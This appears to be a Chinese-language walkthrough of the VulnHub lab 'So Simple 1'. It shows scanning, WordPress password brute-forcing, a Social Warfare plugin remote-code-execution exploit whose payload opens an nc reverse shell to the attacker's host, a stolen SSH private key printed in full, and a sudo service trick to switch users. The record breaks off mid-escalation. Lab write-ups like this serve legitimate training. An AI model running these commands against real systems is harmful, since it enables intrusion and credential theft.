So Simple 1
识别目标主机IP地址
┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:2e:b4:a6 1 60 PCS Systemtechnik GmbH
192.168.56.171 08:00:27:2d:d7:e0 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的Netdiscover工具识别目标主机的IP地址为192.168.56.171
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.171 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-12 02:59 EST
Nmap scan report for bogon (192.168.56.171)
Host is up (0.00015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 5b:55:43:ef:af:d0:3d:0e:63:20:7a:f4:ac:41:6a:45 (RSA)
| 256 53:f5:23:1b:e9:aa:8f:41:e2:18:c6:05:50:07:d8:d4 (ECDSA)
|_ 256 55:b7:7b:7e:0b:f5:4d:1b:df:c3:5d:a1:d7:68:a9:6b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: So Simple
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:2D:D7:E0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.50 seconds
目标主机有两个开放端口22(SSH)以及80(HTTP)
Get Access
从HTTP服务着手信息收集和分析
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.171 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-12 02:59 EST
Nmap scan report for bogon (192.168.56.171)
Host is up (0.00015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 5b:55:43:ef:af:d0:3d:0e:63:20:7a:f4:ac:41:6a:45 (RSA)
| 256 53:f5:23:1b:e9:aa:8f:41:e2:18:c6:05:50:07:d8:d4 (ECDSA)
|_ 256 55:b7:7b:7e:0b:f5:4d:1b:df:c3:5d:a1:d7:68:a9:6b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: So Simple
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:2D:D7:E0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.50 seconds
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ curl http://192.168.56.171
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>So Simple</title>
<body style="background-color:red;">
<img src="so-simple.png" alt="so simple" width="1900" height="790">
</body>
</head>
<!--- Hi, nothing obvious here at the bottom of the source-code, just look further :) --->
页面中有张图片,下载到本地分析一下,
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ wget http://192.168.56.171/so-simple.png
--2022-11-12 03:02:51-- http://192.168.56.171/so-simple.png
Connecting to 192.168.56.171:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 47258 (46K) [image/png]
Saving to: ‘so-simple.png’
so-simple.png 100%[================================================================================================================================>] 46.15K --.-KB/s in 0s
2022-11-12 03:02:51 (556 MB/s) - ‘so-simple.png’ saved [47258/47258]
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ ls
nmap_full_scan so-simple.png
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ steghide extract -sf so-simple.png
Enter passphrase:
steghide: the file format of the file "so-simple.png" is not supported.
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ stegseek so-simple.png /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[!] error: the file format of the file "so-simple.png" is not supported.
没有提取出有用的信息,下一步对目标站点扫描一下网络。
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ gobuster dir -u http://192.168.56.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.171
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/12 03:04:09 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.171/wordpress/]
/server-status (Status: 403) [Size: 279]
Progress: 218316 / 220561 (98.98%)===============================================================
2022/11/12 03:04:38 Finished
===============================================================
发现有一个/wordpress目录,可以用wpscan扫描一下,看有无漏洞或者识别出用户名
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ wpscan --url http://192.168.56.171/wordpress -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.171/wordpress/ [192.168.56.171]
[+] Started: Sat Nov 12 03:09:20 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.171/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.171/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.171/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.171/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.171/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://192.168.56.171/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.3
| Style URL: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.6 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6, Match: 'Version: 1.6'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] simple-cart-solution
| Location: http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/
| Last Updated: 2022-04-17T20:50:00.000Z
| [!] The version is out of date, the latest version is 1.0.2
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 0.2.0 (100% confidence)
| Found By: Query Parameter (Passive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/assets/dist/js/public.js?ver=0.2.0
| Confirmed By:
| Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/readme.txt
[+] social-warfare
| Location: http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/
| Last Updated: 2021-07-20T16:09:00.000Z
| [!] The version is out of date, the latest version is 4.3.0
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Comment (Passive Detection)
|
| Version: 3.5.0 (100% confidence)
| Found By: Comment (Passive Detection)
| - http://192.168.56.171/wordpress/, Match: 'Social Warfare v3.5.0'
| Confirmed By:
| Query Parameter (Passive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.0
| - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.0
| Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/readme.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.56.171/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] max
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Nov 12 03:09:23 2022
[+] Requests Done: 59
[+] Cached Requests: 6
[+] Data Sent: 16.409 KB
[+] Data Received: 608.511 KB
[+] Memory used: 238.527 MB
[+] Elapsed time: 00:00:03
识别出来两个用户名admin, max,看能不能破解出密码,尤其管理员账户。
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ wpscan --url http://192.168.56.171/wordpress -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.171/wordpress/ [192.168.56.171]
[+] Started: Sat Nov 12 03:09:42 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.171/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.171/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.171/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.171/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.171/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://192.168.56.171/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.3
| Style URL: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.6 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6, Match: 'Version: 1.6'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] simple-cart-solution
| Location: http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/
| Last Updated: 2022-04-17T20:50:00.000Z
| [!] The version is out of date, the latest version is 1.0.2
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 0.2.0 (100% confidence)
| Found By: Query Parameter (Passive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/assets/dist/js/public.js?ver=0.2.0
| Confirmed By:
| Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/readme.txt
[+] social-warfare
| Location: http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/
| Last Updated: 2021-07-20T16:09:00.000Z
| [!] The version is out of date, the latest version is 4.3.0
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Comment (Passive Detection)
|
| Version: 3.5.0 (100% confidence)
| Found By: Comment (Passive Detection)
| - http://192.168.56.171/wordpress/, Match: 'Social Warfare v3.5.0'
| Confirmed By:
| Query Parameter (Passive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.0
| - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.0
| Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <===================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.56.171/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] max
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] Performing password attack on Wp Login against 2 user/s
[SUCCESS] - max / opensesame
^Cying admin / EMOPUNK Time: 00:15:50 < > (113924 / 28694744) 0.39% ETA: 66:16:20
[!] Valid Combinations Found:
| Username: max, Password: opensesame
[!] No WPScan API Token given, as a result vulnerability data has not been output. > (113925 / 28694744) 0.39% ETA: 66:16:35
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Nov 12 03:25:37 2022
[+] Requests Done: 114083
[+] Cached Requests: 51
[+] Data Sent: 57.825 MB
[+] Data Received: 658.115 MB
[+] Memory used: 271.977 MB
[+] Elapsed time: 00:15:55
Scan Aborted: Canceled by User
虽然破解出max的密码,但是admin破解失败,因此只能另外寻找攻击矢量。
wpscan扫描出来有一个插件social-warfare, 比较老,看有无相应的利用漏洞:
查询到该版本有一个远程执行漏洞:
https://www.exploit-db.com/exploits/46794
将利用代码下载到Kali Linux本地
根据所给出的步骤,需要在Kali Linux建立一个payload.txt
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ cat payload.txt
<pre>
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.56.137 5555 >/tmp/f');
</pre>
并在Kali Linux启用监听,
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ python2 exploit.py --target http://192.168.56.171/wordpress/ --payload-uri http://192.168.56.137:8000/payload.txt
[>] Sending Payload to System!
执行exploit.py,在Kali LInux成功获得shell
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.171] 35364
bash: cannot set terminal process group (780): Inappropriate ioctl for device
bash: no job control in this shell
www-data@so-simple:/var/www/html/wordpress/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@so-simple:/var/www/html/wordpress/wp-admin$
www-data@so-simple:/home/max$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@so-simple:/home/max$ cat personal.txt
cat personal.txt
SGFoYWhhaGFoYSwgaXQncyBub3QgdGhhdCBlYXN5ICEhISA=
www-data@so-simple:/home/max$
peronal.txt是经过base64编码的,解码一下:
──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ echo "SGFoYWhhaGFoYSwgaXQncyBub3QgdGhhdCBlYXN5ICEhISA=" | base64 -d
Hahahahaha, it's not that easy !!!
www-data@so-simple:/home/max/.ssh$ ls -alh
ls -alh
total 20K
drwxr-xr-x 2 max max 4.0K Jul 14 2020 .
drwxr-xr-x 7 max max 4.0K Jul 15 2020 ..
-rw-r--r-- 1 max max 568 Jul 14 2020 authorized_keys
-rwxr-xr-x 1 root root 2.6K Jul 14 2020 id_rsa
-rw-r--r-- 1 root root 568 Jul 14 2020 id_rsa.pub
www-data@so-simple:/home/max/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAx231yVBZBsJXe/VOtPEjNCQXoK+p5HsA74EJR7QoI+bsuarBd4Cd
mnckYREKpbjS4LLmN7awDGa8rbAuYq8JcXPdOOZ4bjMknONbcfc+u/6OHwcvu6mhiW/zdS
DKJxxH+OhVhblmgqHnY4U19ZfyL3/sIpvpQ1SVhwBHDkWPO4AJpwhoL4J8AbqtS526LBdL
KhhC+tThhG5d7PfUZMzMqyvWQ+L53aXRL1MaFYNcahgzzk0xt2CJsCWDkAlacuxtXoQHp9
SrMYTW6P+CMEoyQ3wkVRRF7oN7x4mBD8zdSM1wc3UilRN1sep20AdE9PE3KHsImrcMGXI3
D1ajf9C3exrIMSycv9Xo6xiHlzKUoVcrFadoHnyLI4UgWeM23YDTP1Z05KIJrovIzUtjuN
pHSQIL0SxEF/hOudjJLxXxDDv/ExXDEXZgK5J2d24RwZg9kYuafDFhRLYXpFYekBr0D7z/
qE5QtjS14+6JgQS9he3ZIZHucayi2B5IQoKGsgGzAAAFiMF1atXBdWrVAAAAB3NzaC1yc2
EAAAGBAMdt9clQWQbCV3v1TrTxIzQkF6CvqeR7AO+BCUe0KCPm7LmqwXeAnZp3JGERCqW4
0uCy5je2sAxmvK2wLmKvCXFz3TjmeG4zJJzjW3H3Prv+jh8HL7upoYlv83UgyiccR/joVY
W5ZoKh52OFNfWX8i9/7CKb6UNUlYcARw5FjzuACacIaC+CfAG6rUuduiwXSyoYQvrU4YRu
Xez31GTMzKsr1kPi+d2l0S9TGhWDXGoYM85NMbdgibAlg5AJWnLsbV6EB6fUqzGE1uj/gj
BKMkN8JFUURe6De8eJgQ/M3UjNcHN1IpUTdbHqdtAHRPTxNyh7CJq3DBlyNw9Wo3/Qt3sa
yDEsnL/V6OsYh5cylKFXKxWnaB58iyOFIFnjNt2A0z9WdOSiCa6LyM1LY7jaR0kCC9EsRB
f4TrnYyS8V8Qw7/xMVwxF2YCuSdnduEcGYPZGLmnwxYUS2F6RWHpAa9A+8/6hOULY0tePu
iYEEvYXt2SGR7nGsotgeSEKChrIBswAAAAMBAAEAAAGBAJ6Z/JaVp7eQZzLV7DpKa8zTx1
arXVmv2RagcFjuFd43kJw4CJSZXL2zcuMfQnB5hHveyugUCf5S1krrinhA7CmmE5Fk+PHr
Cnsa9Wa1Utb/otdaR8PfK/C5b8z+vsZL35E8dIdc4wGQ8QxcrIUcyiasfYcop2I8qo4q0l
evSjHvqb2FGhZul2BordktHxphjA12Lg59rrw7acdDcU6Y8UxQGJ70q/JyJOKWHHBvf9eA
V/MBwUAtLlNAAllSlvQ+wXKunTBxwHDZ3ia3a5TCAFNhS3p0WnWcbvVBgnNgkGp/Z/Kvob
Jcdi1nKfi0w0/oFzpQA9a8gCPw9abUnAYKaKCFlW4h1Ke21F0qAeBnaGuyVjL+Qedp6kPF
zORHt816j+9lMfqDsJjpsR1a0kqtWJX8O6fZfgFLxSGPlB9I6hc/kPOBD+PVTmhIsa4+CN
f6D3m4Z15YJ9TEodSIuY47OiCRXqRItQkUMGGsdTf4c8snpor6fPbzkEPoolrj+Ua1wQAA
AMBxfIybC03A0M9v1jFZSCysk5CcJwR7s3yq/0UqrzwS5lLxbXgEjE6It9QnKavJ0UEFWq
g8RMNip75Rlg+AAoTH2DX0QQXhQ5tV2j0NZeQydoV7Z3dMgwWY+vFwJT4jf1V1yvw2kuNQ
N3YS+1sxvxMWxWh28K+UtkbfaQbtyVBcrNS5UkIyiDx/OEGIq5QHGiNBvnd5gZCjdazueh
cQaj26Nmy8JCcnjiqKlJWXoleCdGZ48PdQfpNUbs5UkXTCIV8AAADBAPtx1p6+LgxGfH7n
NsJZXSWKys4XVLOFcQK/GnheAr36bAyCPk4wR+q7CrdrHwn0L22vgx2Bb9LhMsM9FzpUAk
AiXAOSwqA8FqZuGIzmYBV1YUm9TLI/b01tCrO2+prFxbbqxjq9X3gmRTu+Vyuz1mR+/Bpn
+q8Xakx9+xgFOnVxhZ1fxCFQO1FoGOdfhgyDF1IekET9zrnbs/MmpUHpA7LpvnOTMwMXxh
LaFugPsoLF3ZZcNc6pLzS2h3D5YOFyfwAAAMEAywriLVyBnLmfh5PIwbAhM/B9qMgbbCeN
pgVr82fDG6mg8FycM7iU4E6f7OvbFE8UhxaA28nLHKJqiobZgqLeb2/EsGoEg5Y5v7P8pM
uNiCzAdSu+RLC0CHf1YOoLWn3smE86CmkcBkAOjk89zIh2nPkrv++thFYTFQnAxmjNsWyP
m0Qa+EvvCAajPHDTCR46n2vvMANUFIRhwtDdCeDzzURs1XJCMeiXD+0ovg/mzg2bp1bYp3
2KtNjtorSgKa7NAAAADnJvb3RAc28tc2ltcGxlAQIDBA==
-----END OPENSSH PRIVATE KEY-----
将max用户的私钥拷贝至Kali Linux本地,然后利用该私钥登录目标主机
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ vim max_id_rsa
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ chmod 400 max_id_rsa
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ ssh -i max_id_rsa [email protected]
The authenticity of host '192.168.56.171 (192.168.56.171)' can't be established.
ED25519 key fingerprint is SHA256:+ejHZkFq2lUl66K6hxgfr5b2MoCZzYE8v3yBV3/XseI.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.171' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Nov 12 08:52:51 UTC 2022
System load: 0.0 Processes: 133
Usage of /: 57.6% of 8.79GB Users logged in: 0
Memory usage: 30% IPv4 address for docker0: 172.17.0.1
Swap usage: 0% IPv4 address for enp0s3: 192.168.56.171
* "If you've been waiting for the perfect Kubernetes dev solution for
macOS, the wait is over. Learn how to install Microk8s on macOS."
https://www.techrepublic.com/article/how-to-install-microk8s-on-macos/
47 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Jul 15 19:18:39 2020 from 192.168.1.7
max@so-simple:~$ id
uid=1000(max) gid=1000(max) groups=1000(max),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
max@so-simple:~$ ls -alh
total 52K
drwxr-xr-x 7 max max 4.0K Jul 15 2020 .
drwxr-xr-x 4 root root 4.0K Jul 12 2020 ..
-rw-r--r-- 1 max max 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 max max 3.8K Jul 12 2020 .bashrc
drwx------ 2 max max 4.0K Jul 12 2020 .cache
drwx------ 3 max max 4.0K Jul 12 2020 .gnupg
drwxrwxr-x 3 max max 4.0K Jul 12 2020 .local
-rw------- 1 max max 118 Jul 12 2020 .mysql_history
-rw-r--r-- 1 max max 807 Feb 25 2020 .profile
drwxr-xr-x 2 max max 4.0K Jul 14 2020 .ssh
-rw-r--r-- 1 max max 49 Jul 12 2020 personal.txt
drwxrwxr-x 3 max max 4.0K Jul 12 2020 this
-rwxr-x--- 1 max max 33 Jul 13 2020 user.txt
max@so-simple:~$ cat user.txt
073dafccfe902526cee753455ff1dbb0
得到了第一个flag.
现在要想办法拿到steven的shell
max@so-simple:~$ cat .mysql_history
show databases;
use wordpress;
show tables;
use wp_users;
select wp_users
;
select wp_users;
select * from wp_users
;
max@so-simple:~$ cd ..
max@so-simple:/home$ ls
max steven
max@so-simple:/home$ cd steven
max@so-simple:/home/steven$ ls -alh
total 28K
drwxr-xr-x 3 steven steven 4.0K Jul 15 2020 .
drwxr-xr-x 4 root root 4.0K Jul 12 2020 ..
-rw-r--r-- 1 steven steven 220 Jul 12 2020 .bash_logout
-rw-r--r-- 1 steven steven 3.7K Jul 12 2020 .bashrc
drwxrwxr-x 3 steven steven 4.0K Jul 13 2020 .local
-rw-r--r-- 1 steven steven 807 Jul 12 2020 .profile
-rwxr-x--- 1 steven steven 33 Jul 13 2020 user2.txt
max@so-simple:/home/steven$ cat user2.txt
cat: user2.txt: Permission denied
max@so-simple:/home/steven$ sudo -l
Matching Defaults entries for max on so-simple:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User max may run the following commands on so-simple:
(steven) NOPASSWD: /usr/sbin/service
max@so-simple:/home/steven$ sudo -u steven /usr/sbin/service
Usage: service < option > | --status-all | [ service_name [ command | --full-restart ] ]
max@so-simple:/home/steven$ sudo -u steven /usr/sbin/service ../../bin/sh
$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)
$
参考GTFOBINS网站的方法,利用service命令拿到steven的shell
steven@so-simple:/$ cd /home
steven@so-simple:/home$ cd steven
steven@so-simple:/home/steven$ ls -alh
total 28K
drwxr-xr-x 3 steven steven 4.0K Jul 15 2020 .
drwxr-xr-x 4 root root 4.0K Jul 12 2020 ..
